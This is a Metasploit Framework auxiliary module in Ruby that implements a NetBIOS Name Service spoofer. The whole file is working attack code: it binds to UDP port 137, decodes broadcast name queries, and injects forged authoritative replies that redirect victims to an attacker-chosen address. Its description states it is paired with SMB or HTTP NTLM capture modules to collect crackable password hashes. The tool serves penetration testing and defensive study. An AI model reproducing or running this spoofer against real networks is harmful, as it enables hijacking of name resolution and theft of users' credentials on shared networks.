## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture def initialize super( 'Name' => 'NetBIOS Name Service Spoofer', 'Description' => %q{ This module forges NetBIOS Name Service (NBNS) responses. It will listen for NBNS requests sent to the local subnet's broadcast address and spoof a response, redirecting the querying machine to an IP of the attacker's choosing. Combined with auxiliary/capture/server/smb or capture/server/http_ntlm it is a highly effective means of collecting crackable hashes on common networks. This module must be run as root and will bind to tcp/137 on all interfaces. }, 'Author' => [ 'Tim Medin ' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ [ 'URL', 'http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html' ] ], 'Actions' => [ [ 'Service' ] ], 'PassiveActions' => [ 'Service' ], 'DefaultAction' => 'Service' ) register_options([ OptAddress.new('SPOOFIP', [ true, "IP address with which to poison responses", "127.0.0.1"]), OptString.new('REGEX', [ true, "Regex applied to the NB Name to determine if spoofed reply is sent", '.*']), ]) register_advanced_options([ OptBool.new('Debug', [ false, "Determines whether incoming packet parsing is displayed", false]) ]) deregister_options('RHOST', 'PCAPFILE', 'SNAPLEN', 'FILTER') end def run check_pcaprub_loaded() # Check first since otherwise this is all for naught # MacOS X workaround ::Socket.do_not_reverse_lookup = true @sock = ::UDPSocket.new() @sock.setsockopt(::Socket::SOL_SOCKET, ::Socket::SO_REUSEADDR, 1) @sock.bind('', 137) # couldn't specify srv host because it missed broadcasts @run = true print_status("NBNS Spoofer started. Listening for NBNS requests...") begin while @run # Not exactly thrilled we can never turn this off XXX fix this sometime. packet, addr = @sock.recvfrom(512) vprint_status("Packet Received from #{addr[3]}") rhost = addr[3] break if packet.length == 0 nbnsq_transid = packet[0..1] nbnsq_flags = packet[2..3] nbnsq_questions = packet[4..5] nbnsq_answerrr = packet[6..7] nbnsq_authorityrr = packet[8..9] nbnsq_additionalrr = packet[10..11] nbnsq_name = packet[12..45] decoded = "" nbnsq_name.slice(1..-2).each_byte do |c| decoded << "#{(c - 65).to_s(16)}" end nbnsq_decodedname = "#{[decoded].pack('H*')}".strip() nbnsq_type = packet[46..47] nbnsq_class = packet[48..49] if (nbnsq_decodedname =~ /#{datastore['REGEX']}/i) vprint_status("Regex matched #{nbnsq_decodedname} from #{rhost}. Sending reply...") if datastore['DEBUG'] print_status("transid: #{nbnsq_transid.unpack('H4')}") print_status("tlags: #{nbnsq_flags.unpack('B16')}") print_status("questions: #{nbnsq_questions.unpack('n')}") print_status("answerrr: #{nbnsq_answerrr.unpack('n')}") print_status("authorityrr: #{nbnsq_authorityrr.unpack('n')}") print_status("additionalrr: #{nbnsq_additionalrr.unpack('n')}") print_status("name: #{nbnsq_name} #{nbnsq_name.unpack('H34')}") print_status("full name: #{nbnsq_name.slice(1..-2)}") print_status("decoded: #{decoded}") print_status("decoded name: #{nbnsq_decodedname}") print_status("type: #{nbnsq_type.unpack('n')}") print_status("class: #{nbnsq_class.unpack('n')}") end # time to build a response packet - Oh YEAH! response = nbnsq_transid + "\x85\x00" + # Flags = response + authoratative + recursion desired + "\x00\x00" + # Questions = 0 "\x00\x01" + # Answer RRs = 1 "\x00\x00" + # Authority RRs = 0 "\x00\x00" + # Additional RRs = 0 nbnsq_name + # original query name nbnsq_type + # Type = NB ...whatever that means nbnsq_class+ # Class = IN "\x00\x04\x93\xe0" + # TTL = a long ass time "\x00\x06" + # Datalength = 6 "\x00\x00" + # Flags B-node, unique = whet ever that means datastore['SPOOFIP'].split('.').collect(&:to_i).pack('C*') open_pcap p = PacketFu::UDPPacket.new p.ip_saddr = Rex::Socket.source_address(rhost) p.ip_daddr = rhost p.ip_ttl = 255 p.udp_sport = 137 p.udp_dport = 137 p.payload = response p.recalc capture_sendto(p, rhost) close_pcap else vprint_status("Packet received from #{rhost} with name #{nbnsq_decodedname} did not match regex") end end rescue ::Exception => e print_error("nbnspoof: #{e.class} #{e} #{e.backtrace}") # Make sure the socket gets closed on exit ensure @sock.close end end end